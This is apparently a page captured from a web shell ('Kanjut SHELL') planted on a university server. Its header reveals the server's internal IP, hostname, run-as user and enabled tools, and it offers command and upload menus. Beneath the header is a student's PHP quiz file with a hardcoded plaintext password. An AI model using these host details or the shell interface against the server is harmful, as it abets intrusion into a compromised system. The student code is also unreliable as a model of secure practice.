Kanjut SHELL
Server IP : 172.16.15.8  /  Your IP : 3.145.9.200
Web Server : Apache
System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 7.2.24
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /home/cngray/www/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/cngray/www/Assignment4AExam.php
<?php session_start(); ?>

<!---
	Assignment 4 A
        Corey Gray
        Due: March 3, 2014
        Goal: Make a secure survey that displays 4 questions
                then outputs the correct amount of right and wrong answers.
-->
<center>
<font color = green>

<h2>
	Assignment 4 A
</h2>
</font>
<hr>
<?php

	$pass = $_POST['pass'];
	$_SESSION['psw'] = $pass;
	if($pass != "hw4a")
		print "Go Away!";
	else
	{
?>	
<font color = green size = 5>
<form action = Assignment4AResult.php method = post>

	1:What memory below is the largest?<br>
	<font color = blue>
	<input type = radio name = q1 value = T>1 TB
	<input type = radio name = q1 value = F>1 GB
	<input type = radio name = q1 value = F>10 GB
	<input type = radio name = q1 value = F>55000 Bytes<P>
	</font>

	2: What is the number 100 in hexadecimal?<br>
	<font color = blue>
        <input type = radio name = q2 value = F>100
        <input type = radio name = q2 value = T>64
        <input type = radio name = q2 value = F>1010
        <input type = radio name = q2 value = F>256<P>
	</font>

	3: What was the first modern day computer?<br>
	<font color = blue>
        <input type = radio name = q3 value = F>Mac
        <input type = radio name = q3 value = F>Apple
        <input type = radio name = q3 value = T>Analytical Engine
        <input type = radio name = q3 value = F>PC<P>
	</font>

        4: A computer program that converts assembly language to machine language is called?<br>
	<font color = blue>
        <input type = radio name = q4 value = F>Compiler
        <input type = radio name = q4 value = F>Interpreter
        <input type = radio name = q4 value = F>Comparator
        <input type = radio name = q4 value = T>Assembler<P>
	</font>

<input type = submit value = Submit>
<input type = reset value = Reset>
</font>
</form>
<?php } ?>
<p>
<a HREF = Assignment4A.php> Back</a>
</center>
</back>


Stv3n404 - 2023